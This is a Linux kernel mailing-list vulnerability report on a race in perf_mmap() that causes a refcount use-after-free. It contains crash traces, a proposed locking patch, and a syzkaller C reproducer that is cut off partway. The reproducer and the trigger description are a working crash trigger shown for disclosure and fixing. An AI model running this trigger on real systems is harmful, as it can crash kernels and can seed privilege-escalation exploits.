"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzer that I developed.
Summary
-------
A local user can trigger reference count saturation or a use-after-free (UAF) in the perf_mmap function. The root cause is a race condition in which a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range()) on event->rb outside the locked scope. If the event is closed or the buffer is detached concurrently, the ring_buffer's reference count can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel later accesses or increments it.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.14.0-2)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning.
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the attached C reproducer, which triggers the vulnerability by creating a high-frequency race between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires mmap_mutex to set up the buffer and then drops it. Meanwhile, Thread B (or the main loop) closes the descriptor or modifies the event state, which can trigger destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," producing the refcount_warn_saturate report (or a KASAN splat if the memory has already been reused).
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering reference count saturation or a use-after-free (UAF). The immediate symptom is a kernel warning or a denial of service through a hang or panic, especially in environments with panic_on_warn enabled. The underlying memory corruption, however, is the more significant threat: once a ring_buffer object is accessed after its reference count has reached zero, an attacker may leverage the UAF state for heap grooming. If the freed memory is reallocated with an attacker-controlled structure, the bug could potentially be escalated to local privilege escalation, making this a critical issue for multi-user systems and containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang University
Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
